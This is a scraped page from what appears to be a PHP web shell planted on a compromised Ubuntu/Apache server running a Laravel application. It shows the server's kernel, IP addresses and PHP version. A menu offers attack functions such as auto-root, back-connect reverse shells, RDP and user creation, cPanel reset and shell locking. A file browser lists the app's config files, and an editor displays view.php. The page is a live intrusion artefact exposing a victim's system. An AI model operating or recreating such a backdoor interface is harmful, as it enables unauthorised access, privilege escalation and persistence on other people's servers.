Linux ip-172-31-29-64 6.8.0-1050-aws #53~22.04.1-Ubuntu SMP Fri Mar 13 21:34:27 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
: 172.31.29.64 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
5.6.40-77+ubuntu22.04.1+deb.sury.org+1
ubuntu
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
dashboard.maalgaadi /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
api.php
6.84
KB
-rwxrwxr-x
app.php
8.63
KB
-rwxrwxr-x
auth.php
3.16
KB
-rwxrwxr-x
broadcasting.php
1.37
KB
-rwxrwxr-x
cache.php
2.09
KB
-rwxrwxr-x
compile.php
983
B
-rwxrwxr-x
constants.php
885
B
-rwxrwxr-x
database.php
4.49
KB
-rwxrwxr-x
excel.php
23.13
KB
-rwxrwxr-x
fcm.php
508
B
-rwxrwxr-x
filesystems.php
2.49
KB
-rwxrwxr-x
jwt.php
5.21
KB
-rwxrwxr-x
mail.php
6.11
KB
-rwxrwxr-x
push-notification.php
290
B
-rwxrwxr-x
queue.php
2.65
KB
-rwxrwxr-x
services.php
1.03
KB
-rwxrwxr-x
session.php
5.19
KB
-rwxrwxr-x
view.php
1017
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view.php
<?php return [ /* |-------------------------------------------------------------------------- | View Storage Paths |-------------------------------------------------------------------------- | | Most templating systems load templates from disk. Here you may specify | an array of paths that should be checked for your views. Of course | the usual Laravel view path has already been registered for you. | */ 'paths' => [ realpath(base_path('public/views')), ], /* |-------------------------------------------------------------------------- | Compiled View Path |-------------------------------------------------------------------------- | | This option determines where all the compiled Blade templates will be | stored for your application. Typically, this is within the storage | directory. However, as usual, you are free to change this value. | */ 'compiled' => realpath(storage_path('framework/views')), ];
Close